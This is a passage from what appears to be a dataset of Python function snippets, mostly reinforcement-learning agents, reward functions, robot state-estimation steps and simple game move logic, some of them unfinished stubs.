probs[legal_actions] = 1.0 / len(legal_actions)\n else:\n info_state = np.reshape(info_state, [1, -1])\n q_values = self._session.run(\n self._q_values, feed_dict={self._info_state_ph: info_state})[0]\n legal_q_values = q_values[legal_actions]\n action = legal_actions[np.argmax(legal_q_values)]\n probs[action] = 1.0\n return action, probs", "def act(self, state):\n # Random\n if np.random.rand() <= self.epsilon:\n return self.environment.action_space.sample()\n\n # Model prediction\n return np.argmax(self.model.predict(state)[0])", "def predict(self):\n\n\t\t# Gets odometry for current move (velocity of robot and rotational velocity or robot)\n\t\tself.robot.get_odometry()\n\n\t\t# Updates matricies A, G, P\n\t\tself.robot.update_prediction_matrices()\n\t\t\n\t\t# Predicts position based on old position and odometry readings that are input into the system model\n\t\tself.robot.position = self.robot.position + self.robot.process_model\n\n\t\t# Creates Prediction Propogation matrix\n\t\tself.robot.P = np.dot(self.robot.A, np.dot(self.robot.P, self.robot.A.T)) + np.dot(self.robot.G, np.dot(self.robot.Q, self.robot.G.T))", "def predict(self, state):\n if self.phase is None or self.device is None:\n raise AttributeError('Phase, device attributes have to be set!')\n if self.phase == 'train' and self.epsilon is None:\n raise AttributeError('Epsilon attribute has to be set in training phase')\n\n if self.reach_destination(state):\n return ActionXY(0, 0) if self.kinematics == 'holonomic' else ActionRot(0, 0)\n if self.action_space is None:\n self.build_action_space(state.robot_state.v_pref)\n\n probability = np.random.random()\n if self.phase == 'train' and probability < self.epsilon:\n max_action = self.action_space[np.random.choice(len(self.action_space))]\n else:\n max_action = None\n max_value = float('-inf')\n max_traj = None\n\n if self.do_action_clip:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n action_space_clipped = self.action_clip(state_tensor, self.action_space, self.planning_width)\n else:\n action_space_clipped = self.action_space\n\n for action in action_space_clipped:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n next_state = self.state_predictor(state_tensor, action)\n max_next_return, max_next_traj = self.V_planning(next_state, self.planning_depth, self.planning_width)\n reward_est = self.estimate_reward(state, action)\n value = reward_est + self.get_normalized_gamma() * max_next_return\n if value > max_value:\n max_value = value\n max_action = action\n max_traj = [(state_tensor, action, reward_est)] + max_next_traj\n if max_action is None:\n raise ValueError('Value network is not well trained.')\n\n if self.phase == 'train':\n self.last_state = self.transform(state)\n else:\n self.traj = max_traj\n\n return max_action", "def play_epsilon_greedy_policy(self, board):\n policy = np.random.choice(['random', 'q_agent'], 1, p=[self.epsilon, 1-self.epsilon])[0]\n if policy == 'random':\n move, _ = RandomAgent.play(board)\n else:\n move, q_value = self.play(board)\n self.after_move()\n return move, policy", "def get_move_predictions(model, legal_moves, session):\n sessions, prob_dict = open_prediction_tree(legal_moves, session)\n inputs = np.zeros((len(sessions), INPUT_SIZE))\n win_status = np.zeros(len(sessions))\n for j, sess in enumerate(sessions):\n inputs[j,:] = session_to_input(sess)\n win_status[j] = get_win_status(sess)\n sess_preds = model.predict(inputs)\n fix_rewards(sess_preds, win_status)\n \n # Calculating according to the expanded tree:\n move_preds = np.zeros((len(legal_moves), 4))\n for j, move in enumerate(prob_dict):\n for sess_index in prob_dict[move]:\n # print('\\n\\n')\n # print(f'i is is {i}, move is {move}, sess_index is {sess_index}')\n # print(f'sess_preds shape is {sess_preds.shape}')\n # print(f'prob_dict is {prob_dict}')\n move_preds[j,:] += prob_dict[move][sess_index] * sess_preds[sess_index,:]\n return move_preds", "def _predict(self):\n if self.net:\n # divide board\n # this means reverting changes to the env, test_env, and agent.py\n boards = []\n for child in self.children:\n boards.append(child.env.separate_players())\n boards = np.array(boards)\n boards = np.reshape(boards, (-1, boards.shape[1], boards.shape[2]) )\n # assign Q, pi from net\n Q, pi = self.net.model.predict_on_batch(boards)\n for i,child in enumerate(self.children):\n child.Q = Q[i][0]\n child.pi = pi[i]\n if not child.done(): child.pi[child.pi==0] = 1/len(child.env.legal_moves())\n #child.pi = np.random.dirichlet(pi*self.expl + 1) # add noise\n\n # set pi and Q for initial node\n if not self.parent: \n self.pi = np.ones(7) / 7\n self.Q = 0\n\n else:\n Q = 0 # unkown outcome\n pi = np.zeros(7)\n legal_moves = self.env.legal_moves()\n n_moves = len(legal_moves)\n if n_moves: pi[legal_moves] = 1/n_moves\n return Q, np.array(pi)", "def reset(self, evaluate=False):\n self.reset_env()\n for _ in range(20):\n self.__publish_cmd(0.0, 0.0)\n self.rate.sleep()\n self.__publish_cmd(1.0, 0.0)\n self.rate.sleep()\n self.prev_pos_index, _ = self.__find_closest_point(1088)\n self.prev_reward = 0.0\n \n \n # If this run isn't being evaluated, we need to add some randomness to the starting point or else the agents will not learn well\n # if not evaluate:\n # random_steps = np.random.randint(0, 20)\n # ref = self.ref_track\n # l = len(ref)\n # curr_pos_index, _ = self.__find_closest_point(self.prev_pos_index)\n # for _ in range(random_steps):\n # ranges = self.get_state()\n # max_range = np.max(ranges)\n # indices = np.where(ranges>=max_range)\n # target_index = np.mean(indices)\n # angle = ((2 * self.lidar_angle) / len(ranges)) * target_index - self.lidar_angle\n \n # # future_pos_index = (curr_pos_index + 20) % l\n # # goal_point = ref[future_pos_index]\n # # print(goal_point)\n # # curr_pos = copy.copy(self.pos) # [x, y, yaw, speed]\n # # dx = goal_point[0] - curr_pos[0]\n # # dy = goal_point[1] - curr_pos[1]\n # # yaw = curr_pos[2]\n # # xgv = (dx * np.cos(yaw)) + (dy * np.sin(yaw))\n # # ygv = (-dx * np.sin(yaw)) + (dy * np.cos(yaw))\n # # angle = -np.arctan2(ygv,xgv)\n # # print(angle)\n # self.step(angle)\n # curr_pos_index, _ = self.__find_closest_point(curr_pos_index)\n \n # self.prev_pos_index = copy.copy(curr_pos_index)\n\n \n # print(self.prev_pos_index)\n\n return", "def act(self, state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.n_actions)\n act_values = self.model.predict(state)\n return np.argmax(act_values[0])", "def move_simulation(self):\n import simulation\n\n dt = 1e-3 # Pas de temps en seconde.\n x, y = [], []\n state = simulation.State() # On positione la voiture a l'origine\n for i, t in enumerate(np.arange(0, self.portion_duration*self.nbr_portions, dt)):\n state.update(*self(t), dt=dt)\n if not i % 1000:\n x.append(state.x)\n y.append(state.y)\n\n # self.score = x[-1]**2 + y[-1]**2 # Bidon et mal fait, c'est juste pour le test.\n # self.score = y[-1]-abs(x[-1])\n # self.score = 1 / ( (self.arriveeX*self.nbr_portions/10.0-x[-1])**2 + (self.arriveeY*self.nbr_portions/10.0-y[-1])**2 ) # Tout droit jusqu'au point choisi\n self.score = 1 / ( (self.arriveeX*self.nbr_portions*4.0/20-x[-1])**2 +\n (self.arriveeY*self.nbr_portions*4.0/20-y[-1])**2 ) # Le point choisi dépend du point standard (0.1) et de nbr_portions\n\n return x, y", "def take_action(self, observation):\r\n if (np.random.rand() <= self.epsilon):\r\n action = random.randrange(self.action_size)\r\n return action\r\n act_values = self.model.predict(observation) # Forward Propagation\r\n action = np.argmax(act_values[0])\r\n return action", "def rtest_predictoutcome():\n\n #define cohort size\n npatients = 2\n\n #init healthy patients\n simulator = AbbcEnvironment(patients=npatients)\n\n #simulate healthy patients for long term in short term increments\n nstep = int(long_term/short_term)\n\n #define action taken : -1 means patients will be simulated as healthy\n action = np.repeat(-1, npatients)\n\n #init episode list\n episode = [simulator.state]\n\n #main simulation loop to generate episodes\n for step in range(nstep):\n episode += simulator.take_action(action=action, simtime=short_term)\n\n #episode length is 1+2*nstep consisting of intit state (5xnpat) followed by\n # next state and reward (1xnpat) repeating each time step.\n #print(episode)\n #print(len(episode))\n\n #---semi gradient temporal difference (0) algorithm ---\n #init hyperparameters\n alpha = .1 #learning rate\n #init Value function model\n agent = AbbcAgent(discount=1.0)\n #loop over episodes\n for patient in range(npatients):\n #state = [nstep]\n #state += episode[0][:,patient] #get inital state\n state = np.append(episode[0][:,patient],nstep).reshape((6,1)) #get inital state\n\n print(state)\n #loop over time steps in episode\n for k in range(1,nstep+1):\n #get next state and reward\n #nextstate = [nstep-k]\n #nextstate = episode[k*2-1][:,patient]\n nextstate = np.append(episode[k*2-1][:,patient],nstep-k).reshape((6,1))\n\n reward = episode[k*2][patient]\n\n #get magnitude for forces\n magnitude = alpha * (reward + agent.discount * agent.get_value(nextstate)\n - agent.get_value(state))\n #compute forces\n forces = computeforces(agent.prednet, state, 0, \"iden\")\n\n #update model\n for layer in forces:\n index = layer[\"layer\"]\n agent.prednet[index][\"weight\"] += magnitude * layer[\"fweight\"]\n agent.prednet[index][\"bias\"] += magnitude * layer[\"fbias\"]\n\n state = np.copy(nextstate)\n\n\n #make predictions\n state = np.append(episode[0][:,patient],nstep).reshape((6,1)) #get inital state\n print(agent.get_value(state))\n\n #Value function approximates outcome return at time horizon.\n assert(False)\n\n ##define action taken\n #action = np.repeat(2, npatients)\n ##main simulation loop\n #for step in range(nstep):\n # _, drugy_reward[step,:] = simulator.take_action(action=action, simtime=short_term)", "def predict(self, delta):\n self.position = self.sensor_model.sample_prediction(self.position+delta)", "def act(self, observer):\n # get state and extract the q matrix values #\n state = self.get_state(observer)\n q = self.q_mat[int(state), :].tolist()[0]\n\n # can't have negative probs, so scale everything to be nonnegative\n q = [i + min(q) for i in q]\n\n max_q = max(q)\n\n if random.random() < self.epsilon:\n # get raw rewards and compute the normalization const. #\n # print(q)\n probs = [i + (max_q + 0.01)*np.random.rand() for i in q]\n sum_probs = sum(probs)\n\n # normalize to probabilities\n probs = [float(i)/sum_probs for i in probs]\n\n # make a choice based on q matrix #\n action_ind = np.random.choice(range(len(q)), p = np.array(probs))\n else:\n # what does this do? \n maxes = [i for i, x in enumerate(q) if x == max_q]\n action_ind = np.random.choice(maxes)\n\n action = self.actions[action_ind]\n self.prev_state = int(state)\n self.prev_action = int(action_ind)\n\n return action\n\n # possible movements\n # options = [NORTH, SOUTH, WEST, EAST]\n # prob_wght = 0.1\n #\n # if(self.prev_posn is None):\n # # random choice if first move\n # return random.choice(options)\n # else:\n # # augment probabilities based on previous posn\n # tuple_diff = tuple(np.subtract(self.posn, self.prev_posn))\n # # tuple_diff = (0, 1)\n # probs = [0.25 + prob_wght*tuple_diff[1],\n # 0.25 - prob_wght*tuple_diff[1],\n # 0.25 - prob_wght*tuple_diff[0],\n # 0.25 + prob_wght*tuple_diff[0]]\n # # print(probs)\n # return np.random.choice(options, size=1, p=probs)[0]", "def simulation():\n # initialize action set\n action_set = np.zeros(int((s.MAX_INSPECT - s.MIN_INSPECT) / s.DELTA) + 3)\n x, i = s.MIN_INSPECT, 1\n while x <= s.MAX_INSPECT:\n action_set[i] = x\n x += s.DELTA\n i += 1\n action_set[-1] = np.inf\n action_number = len(action_set)\n\n # initialize current state\n current_state = math.floor(np.random.rand(1) * s.NUM_STATES)\n\n # initialize action index\n if current_state == 0:\n action_index = 0\n elif current_state == s.NUM_STATES - 1:\n action_index = action_number - 1\n\n if current_state != 0 and current_state != s.NUM_STATES - 1:\n action_index = action_number - 2\n\n # initialize policy set\n greedy_policy = np.zeros(s.NUM_STATES)\n greedy_policy[-1] = np.inf\n for i in range(1, s.NUM_STATES - 1):\n greedy_policy[i] = s.MAX_INSPECT\n\n visit_times = np.zeros([s.NUM_STATES, action_number])\n\n # initialization for simulation\n falpha, Aalpha, delay_T, uni_parameter = equivalent_markov(greedy_policy)\n stable_prob, potential = stable_potential(falpha, Aalpha, uni_parameter)\n last_value = falpha + np.matmul(Aalpha, potential)\n dis_value = last_value\n # ave_vector = np.matmul(stable_prob, falpha)\n # ave_estimate = ave_vector.tolist()\n each_transit_cost, each_transit_time, total_reward = (0 for i in range(3))\n\n # initialize DQN model if selected\n dqn = DQN() if MODEL == 1 else None\n # initialize Q-table if Q-learning selected\n q_factor = ql.init_q_factor(action_number) if MODEL == 2 else None\n\n for out_step in range(s.EPOCH):\n epsilon = s.EPSILON_1 if MODEL == 1 else s.EPSILON_2\n\n for inner_step in range(s.EPOCH_LEARN):\n\n visit_times[current_state, action_index] += 1\n current_action = greedy_policy[current_state]\n\n inspect_cost = 0 if current_state == s.NUM_STATES - 1 else s.K5 * current_action\n\n flag, sojourn_T, service_T, next_state = state_transition(current_state, current_action)\n each_transit_time = s.DISCOUNT * each_transit_time + (sojourn_T - each_transit_time) / pow(\n out_step * s.EPOCH_LEARN + (inner_step + 1), s.Q_AVE_STEP)\n end_sojourn_T = math.exp(- s.ALPHA * sojourn_T)\n end_serve_T = math.exp(- s.ALPHA * service_T)\n\n if s.ALPHA == 0:\n dis_T, dis_serve_T, dis_wait_T = sojourn_T, service_T, sojourn_T - service_T\n else:\n dis_T, dis_serve_T = (1 - end_sojourn_T) / s.ALPHA, (1 - end_serve_T) / s.ALPHA\n dis_wait_T = (end_serve_T - end_sojourn_T) / s.ALPHA\n\n if flag == 0: # no processing, waiting\n cost_real = (s.K1 * (s.NUM_STATES - current_state) + s.K3) * sojourn_T + inspect_cost\n cost_purt = (s.K1 * (s.NUM_STATES - current_state) + s.K3) * dis_T + inspect_cost\n else: # no waiting, processing\n cost_real = s.K1 * (s.NUM_STATES - current_state - 1) * sojourn_T + s.K2 * service_T + s.K3 * (\n sojourn_T - service_T) + s.K4 + inspect_cost\n cost_purt = s.K1 * (s.NUM_STATES - current_state - 1) * dis_T + s.K2 * dis_serve_T + s.K3 * dis_wait_T \\\n + s.K4 * end_serve_T + inspect_cost\n\n each_transit_cost = s.DISCOUNT * each_transit_cost + (cost_real - each_transit_cost) / (\n pow(out_step * s.EPOCH_LEARN + (inner_step + 1), s.Q_AVE_STEP))\n\n ave_q_cost = each_transit_cost / each_transit_time\n # ave_estimate.append(ave_q_cost)\n cost_dis = cost_purt - ave_q_cost * dis_T\n\n if MODEL == 1:\n reward = - cost_dis\n dqn.store_transition(current_state, action_index, reward, next_state)\n if dqn.memory_counter >= s.MEMORY_CAPACITY:\n dqn.learn(s.EPOCH_LEARN, inner_step, PS)\n else:\n difference = cost_dis + end_sojourn_T * min(q_factor[next_state, :]) \\\n - q_factor[current_state, action_index]\n q_factor = ql.update_q_factor(q_factor, current_state, action_index, difference,\n visit_times, inner_step, PS)\n current_state = next_state # transit to next state\n\n if current_state == 0:\n action_index = 0\n elif current_state == s.NUM_STATES - 1:\n action_index = action_number - 1\n else:\n if MODEL == 1:\n action_index = int(dqn.choose_action(current_state, epsilon))\n if action_set[action_index] <= 1:\n greedy_policy[current_state] = action_set[action_index]\n else:\n greedy_policy[current_state] = 1\n else:\n if np.random.rand(1) < epsilon:\n action_index = int(np.floor(np.random.rand(1) * (action_number - 2)) + 1)\n else:\n # minimal_q_value = np.min(q_factor[current_state, :])\n action_index = np.argmin(q_factor[current_state, :])\n greedy_policy[current_state] = action_set[action_index]\n\n # store the policy learned from the iterations\n optimal_policy = greedy_policy\n\n if MODEL != 1:\n for i in range(1, s.NUM_STATES - 1):\n # minimal_q_value_temp = np.min(q_factor[i, :])\n action_index_temp = np.argmin(q_factor[i, :])\n optimal_policy[i] = action_set[action_index_temp]\n\n falpha, Aalpha, delay_T, uni_parameter = equivalent_markov(optimal_policy)\n stable_prob, potential = stable_potential(falpha, Aalpha, uni_parameter)\n\n last_value = falpha + np.matmul(Aalpha, potential)\n dis_value = np.concatenate((dis_value, last_value), axis=1)\n total_reward += - np.ndarray.item(last_value[0])\n # new_ave_cost = np.matmul(stable_prob, falpha)\n # ave_vector = np.concatenate((ave_vector, new_ave_cost))\n print(\"epoch: {} , the epoch reward is {}\".format(out_step, round(- np.ndarray.item(last_value[0]), 2)))\n\n # result = np.asarray(dis_value)\n print(\"total reward:\", total_reward)\n\n return dis_value, total_reward", "def move(self):\n if self._z >= 75:\n a = random.random()\n print(str(a))\n if a < 0.2:\n self._z += 1\n if a > 0.2 and a < 0.9:\n self._z -= 1\n if a > 0.9:\n self._z = self._z\n else: \n self._z -= 1\n \n b = random.random()\n print(str(b))\n if b < 0.1:\n self._y += 1\n if b > 0.1 and b < 0.2:\n self._y -= 1\n if b > 0.2 and b < 0.25:\n self._x -= 1\n if b > 0.25:\n self._x += 1", "def get_reward(self):\n \n pos_error = np.sum(abs(self.sim.pose[:3] - self.target_pos[:3]))\n pos_error = np.log(pos_error)\n z_error = abs(self.sim.pose[2] - self.target_pos[2])\n velocity_error = np.dot(np.subtract(1, np.tanh(self.sim.pose[:3])), self.sim.v)\n reward = 1. - pos_error - 0.02 * z_error\n #reward = 1 - z_error - xy_erro, r/800 - ((1-z_error)*z_v/100) - angv/20\n reward = np.clip(reward, -2, None)\n\n #reward = np.maximum(np.minimum(reward, max_reward), min_reward)\n\n return reward", "def act(self, state):\n\t\trand_val = np.random.rand()\n\t\tif not self.is_eval and rand_val <= self.epsilon: # Do a random action only in train phase\n\t\t\treturn random.randrange(self.action_size)\n\n\t\tif self.firstIter: # If this is the first iteration, just do a \"hold\" action\n\t\t\tself.firstIter = False\n\t\t\treturn 2 # 2 = \"Hold action\"\n\n\t\toptions = self.model.predict(state) # Do a prediction based on a specific observation\n\t\t#print(options)\n\n\t\ttot = np.sum(options[0])\n\t\toptions[0] = options[0] / tot\n\t\t#print(options)\n\n\t\trand = random.random()\n\n\t\t#print(\"randm:\" + str(rand))\n\t\tif rand <= options[0][0]:\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 0\")\n\t\t\treturn 0\n\n\t\telif options[0][0] < rand <= (options[0][0] + options[0][1]):\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 1\")\n\t\t\treturn 1\n\t\telif (options[0][0] + options[0][1]) < rand <= (options[0][0] + options[0][1] + options[0][2]):\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 2\")\n\t\t\treturn 2\n\t\telse:\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 3\")\n\t\t\treturn 3\n\n\t\t#return np.argmax(options[0])'''", "def simulate(board, move):\n reward = 0\n\n board.apply_white_move(move)\n if board.cur_player_won() == 1:\n reward = 1\n elif board.cur_player_won() == 2:\n reward = -1\n elif board.cur_player_won() == 0:\n reward = -.25\n\n return board, reward", "def get_prediction(self, trump, num_players):\n prediction = random.randrange(len(self.hand))\n self.prediction = prediction\n return prediction", "def training_policy(self, state):\n if self.epsilon > random.random():\n return random.randint(0, 1)\n return self.policy(state)", "def chooseAction(self, epsilon, state):\n if random.uniform(0, 1) < epsilon:\n return random.randrange(9)\n\n cur_best_val = -float('inf')\n cur_best_action = 0\n\n data = env.getAllNextStates(state)\n\n with torch.no_grad():\n for action, next_state, done in data:\n if next_state != state:\n value = self.NN(self.RBF[next_state]).item() if not done else 0\n if value > cur_best_val:\n cur_best_val = value\n cur_best_action = action\n #print(data)\n return cur_best_action", "def update_dead_reckoning(self):\n now = time.time()\n time_diff_s = now - self._last_observation_s\n self._last_observation_s = now\n\n self._prediction_step(time_diff_s)", "def take_action(self, state):\n if self.epsilon_decay is not None:\n self.epsilon *= self.epsilon_decay\n if random.random() < self.epsilon:\n action = super(BaseQAgent, self).random_next_action(state)\n self.log('exploration move: {0}'.format(str(action)))\n else:\n action = self.greedy_next_action(state)\n self.log('exploitation move: {0}'.format(str(action)))\n return action", "def get_delta_distance_reward(self, previous_pos, new_pos):\n #cosine = np.dot(self.target_pos-previous_pos, new_pos-previous_pos)/((np.dot(self.target_pos-previous_pos,self.target_pos-previous_pos) * np.dot(new_pos-previous_pos,new_pos-previous_pos))**(0.5)+0.0001)\n dist_new=np.dot(new_pos-self.target_pos,new_pos-self.target_pos)**(0.5)\n dist_old=np.dot(previous_pos-self.target_pos,previous_pos-self.target_pos)**(0.5)\n if dist_old<=2.5*self.target_margin:\n reward=1000*self.total_distance\n print(\"\\nSUCESS!!!!!\")\n self.success=1\n #if cosine>=0:\n #reward=self.runtime\n elif self.hit_the_bounds(new_pos):\n reward=-500*self.total_distance\n else:\n reward=-7.5*dist_old/self.total_distance\n \n if dist_new<=5*self.target_margin:\n print(\"$$$$$ Almost there $$$$$\")\n if np.sign(dist_old-dist_new)==-1:\n print(\"%%%%%% Moving away :( %%%%\")\n else:\n print(\"%%%% Moving closer :) %%%%\") \n elif dist_new<=10*self.target_margin:\n print(\"$$$$$ Getting there $$$$$\")\n if np.sign(dist_old-dist_new)==-1:\n print(\"%%%%%% Moving away :( %%%%\") \n else:\n print(\"%%%% Moving closer :) %%%%\")\n \n return reward", "def evaluate_position(num_items):\n comp_wins = 0\n player_wins = 0\n\n initial_move = random.randrange(MAX_REMOVE + 1)\n num_items -= initial_move\n next_move = random.randrange(MAX_REMOVE + 1)\n \n\n\n\n\n\n \n \n return 0", "def predict_outcome(self, game:'Game') -> float: # noqa: E0602, F821\n response = self.__send_game(game)\n return response[1]", "def generate_prediction(self, model, verbose=False):\n #self.confidence = confidence # set confidence for test 90%, 95% (default), 99%\n #\n self.observation[\"created_later\"] = \"generate_prediction\"\n #print(self.observation)\n print(self.observation[\"created_later\"])\n return 666.", "def predict(self, observation, *args, **kwargs):\n if self.env is not None and np.random.rand() <= self.epsilon:\n action = random.randrange(self.action_size)\n else:\n act_values = self.policy.predict(observation)\n action = np.argmax(act_values[0])\n return action, None", "def nextMoveDecision(self):\n b = random.randint(1, 9) \n while (self.Occupied(b)):\n b = random.randint(1, 9) \n return b", "def move(self):\n if self.learn is None:\n return random.choice(moves)\n else:\n return self.storedmove", "def process_simulation(self):\n for i in range(self._n):\n probability = self._alpha / float(self._alpha + i - 1)\n tmp = np.random.uniform(size=(1,))\n if tmp < probability:\n self._results.append(np.random.normal(1))\n else:\n self._results.append(np.random.choice(self._results[:i-1], 1)[0])", "def calc_epsilon(y_true, y_pred, weights):\n return float(np.dot(weights, y_pred == y_true))", "def get_reward(self):\n #original reward function: reward = 1.-.3*(abs(self.sim.pose[:3] - self.target_pos)).sum()\n thrusts = self.sim.get_propeler_thrust(self.sim.prop_wind_speed)\n linear_forces = self.sim.get_linear_forces(thrusts)\n distance = np.linalg.norm(self.target_pos - self.sim.pose[:3])\n #speed = math.sqrt(np.square(self.sim.find_body_velocity()).sum())\n #with 300x300x300m env, the max distance from one corner to another is 519\n max_distance = 519\n #Focus quadcopter on not crashing but first rewarding an upward linear force until at the height of the target\n if self.sim.pose[2] < self.target_pos[2]:\n #velocity_discount = 1/speed\n reward = np.tanh(linear_forces[2])\n #after getting to the correct z-coordinate, move to the correct y-coordinate\n elif self.sim.pose[1] < self.target_pos[1]:\n #velocity_discount = 1/speed\n reward = 1 + np.tanh(linear_forces[1])\n #finally, after getting rewards for the x and y coordinates, give reward for distance\n #at this stage, the drone will have overshot the x and y coordinates, but it would be in a better area to\n #start searching for the x coordinate\n elif distance > 1 and self.sim.pose[2] > self.target_pos[2] and self.sim.pose[1] > self.target_pos[1] :\n reward = 2 + (1-math.pow((distance/300),.04))\n elif distance < 1:\n self.success = True\n reward = 100\n #possible reward for hover: np.exp(-np.square(linear_forces[2]))\n return reward", "def randomMove(self, game):\n #time.sleep(0.25)\n return random.choice(game.get_all_legal_moves())", "def prediction_step(self,delta_t,v,om,x_k_1,P_k_1,Q,jacobian,motion_model):\n\n\t\t# Motion Model Returns the states [x,y,theta]\n\t\tx_k_1[0],x_k_1[1],x_k_1[2] = motion_model(v,om,x_k_1[0],x_k_1[1],x_k_1[2],delta_t) \n \n\t\t#Jacobian of Motion Model w.r.t last state and Noise \n\t\tF, L = jacobian(v,x_k_1[2],delta_t)\n\n\t\t# Predicted Co-Variance\n\t\tP_k_1 = F.dot((P_k_1).dot(F.T)) + L.dot((Q).dot(L.T))\n\n\t\treturn x_k_1,P_k_1", "def train(self, game_life):\n rewards = [obs.get('reward') for obs in game_life]\n cum_rewards = sum(rewards)\n\n # manage the graphics\n self.reward_graph.append(cum_rewards)\n plt.plot(self.reward_graph)\n x, y, z = peri_bounding_box\n\n # The amound of nudge\n if cum_rewards:\n displacement = cum_rewards * self.displacement\n else:\n displacement = 0 - self.displacement\n\n # Store observations and perturbed predictions\n data, targets = [], []\n\n for obs in game_life:\n\n # Perturb action\n action, prediction = obs.get('action')\n if self.epsilon and (random.uniform(0, 1.0) < self.epsilon):\n action = random.randrange(18)\n\n # Copy\n update = list(prediction)\n\n # Update only the target action\n update[0][action] = update[0][action] + displacement\n\n\n data.append(\n # Apply bounding box before appending\n np.array(obs.get('observation')[x[0]:x[1], y[0]:y[1], :])\n )\n\n\n update = np.array(update).reshape(1,18),\n targets.append(update)\n\n if data and len(data) > 15:\n # Image processing\n datagen = preprocessing.image.ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n datagen.fit(data)\n\n # Training data generator\n train = datagen.flow(np.array(data), np.squeeze(np.array(targets)),\n batch_size=16)\n\n # Finally train\n self.graph.fit_generator(train, steps_per_epoch=len(data)/16,\n epochs=30, verbose=0,\n callbacks=[\n callbacks.EarlyStopping(monitor='acc'),\n # callbacks.ModelCheckpoint() ?\n ]\n )", "def predict_plan(self, time_step: TimeStep, state: PlannerState,\n epsilon_greedy):\n pass", "def decision():\n return random.random() > 0.5", "def act(self):\n\n self.state = self.next_state\n self.choose_random = np.random.uniform(0., 1.) < self.epsilon\n # If exploring\n if self.choose_random:\n # Select a random action using softmax\n idx = np.random.choice(4)\n self.action = self.idx2act[idx]\n else:\n # Select the greedy action\n self.action = self.idx2act[self.argmaxQsa(self.state)]\n\n self.reward = self.move(self.action)\n self.total_reward += self.reward", "def _dense_reward(self) -> float:\n y = 1\n target_goal_dists = []\n for target_shape in self.__debris_shapes:\n target_pos = target_shape.shape_body.position\n goal_pos = (target_pos[0], y) # Top of screen.\n dist = np.linalg.norm(target_pos - goal_pos)\n if target_pos[1] > 0.88:\n dist = 0\n target_goal_dists.append(dist)\n target_goal_dists = np.mean(target_goal_dists)\n return -1.0 * target_goal_dists", "def sample_prediction(self, predicted_position):\n return predicted_position + randn()*self.odom_noise_rate", "def policies(self, QTable, epsilon, state, next_states, action_to_do): # Inspiration from https://www.geeksforgeeks.org/q-learning-in-python/?fbclid=IwAR1UXR88IuJBhhTakjxNq_gcf3nCmJB0puuoA46J8mZnEan_qx9hhoFzhK8\r\n num_actions = 5 # 5 actions-value, [moved_out, into_goal, send_opp_home, send_self_home, move_token] \r\n def epsilonGreedyPolicy(): \r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n valid_act_len = len(np.where(valid_actions==True)[0])\r\n\r\n Action_probabilities = np.ones(num_actions, dtype = float) * epsilon / valid_act_len # divides probability based on number of valid actions and epsilon (each 0.025 if 4 actions) \r\n Action_probabilities = np.multiply(Action_probabilities, valid_actions)\r\n\r\n # If same values in QTable choose random valid action \r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n Action_probabilities[best_action] += (1.0 - epsilon) # Assigns rest probability to best action so probability sums to 1\r\n\r\n return Action_probabilities \r\n\r\n def greedyPolicy():\r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n\r\n Action_probabilities = np.zeros(num_actions, dtype = float)\r\n\r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n\r\n Action_probabilities[best_action] += 1.0\r\n return Action_probabilities\r\n\r\n\r\n if(self.__chosenPolicy == \"epsilon greedy\"):\r\n return epsilonGreedyPolicy \r\n if(self.__chosenPolicy == \"greedy\"):\r\n return greedyPolicy", "def move(self):\n if random.random() < 0.5:\n self.y = (self.y + 1) % 100\n else:\n self.y = (self.y - 1) % 100\n if random.random() < 0.5:\n self.x = (self.x + 1) % 100\n else:\n self.x = (self.x - 1) % 100", "async def predict(property: Property):\n prediction = model.predict(property.to_df())\n price = np.exp(prediction[0]) \n return '{}$ per night is an optimal price.'.format(round(price))", "def sonarpredict(self):\n\n # Calculate sample time --> # finish_time - time that program entered_this_func\n if not self.sample_T:\n sample_T = 1.0/2\n else:\n self.sample_T = self.finish_time - start_time\n start_time = time.time()\n\n\n\n # create robot position and orientation state variable\n # initialize it only once after we get first measurement, not here\n x_state_var = np.array([[self.x], [self.y], [self.yaw]])\n\n # control variables (linar and angular velocity)\n u_linear_velocity_x = self.wheel_velocity.linear.x\n w_angular_velocity_theta = self.wheel_velocity.angular.z\n\n u_state_var = np.array([[w_angular_velocity_theta*(sample_T)],\n [u_linear_velocity_x*(sample_T)],\n [0]])\n\n # calculate neccessary error matrix prediction\n A_k = self.calculate_A(u_state_var[1], x_state_var[2], u_state_var[0])\n W_k = self.calculate_W(u_state_var[1], x_state_var[2], u_state_var[0])\n Q_k = self.calculate_Q(u_state_var[0])\n\n # calculate x_prior in k+1\n self.x_prior = self.predict_x_next(x_state_var, u_state_var, [0, 0, 0])\n\n # calculate P_prior in k+1\n self.P_prior = self.predict_P_next(A_k, self.P_k, W_k, Q_k)\n\n #print('nonlinear_func', self.nonlinear_function(x_state_var, u_state_var, [0, 0, 0]))\n\n sonar_sim_list = []\n sonar_sim_list = map(self.hit_sonar , [x for x in range(15) if x % 2])\n # sonar_sim_list_append = sonar_sim_list.append\n # for i in [x for x in range(15) if x%2]:\n # sonar_sim_list.append(self.hit_sonar(i))\n\n # estimated obstacle location with good obstacles\n object_loc = [x[-1] for x in sonar_sim_list if abs(x[0]-x[1]) < 0.8]\n\n # sonar diffs (y(k+1) - h(x(k+1), 0)\n self.sonar_diffs 